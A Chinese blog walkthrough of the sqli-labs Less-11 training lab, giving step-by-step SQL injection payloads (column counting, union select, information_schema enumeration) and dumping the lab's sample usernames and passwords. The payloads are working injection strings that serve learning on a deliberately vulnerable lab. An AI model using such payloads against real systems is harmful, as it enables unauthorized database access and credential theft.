首页 > 代码库 > sqli-labs修炼の道 less-11
sqli-labs修炼の道 less-11
首先判断字段数目
Payload语句: admin‘ order by 2—s
正常显示故字段数目大于等于2
Payload语句: admin‘ order by 3—s
显示位置字段,结合前面的所以字段数为2
构造联合查询语句Payload发现显示位
显示位为1,2
Payload: adm‘ union select 1,2—s
注入查询当前用户以及当前数据库
Payload: adm‘ union select user(),database()—s
构造语句显示当前数据库的所有表名:
表名:emails,referers,uagents,users
Payload: adm‘ union select group_concat(table_name),database() from information_schema.tables where table_schema=‘security‘—s
我们所需要的信息在users表中故
字段名: id,username,password
我们来查询username,password字段的内容
Username: Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
Password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4
Username与Password一一对应
Payload: adm‘ union select group_concat(username),group_concat(password) from users-- s
sqli-labs修炼の道 less-11
声明:以上内容来自用户投稿及互联网公开渠道收集整理发布,本网站不拥有所有权,未作人工编辑处理,也不承担相关法律责任,若内容有误或涉及侵权可进行投诉: 投诉/举报 工作人员会在5个工作日内联系你,一经查实,本站将立刻删除涉嫌侵权内容。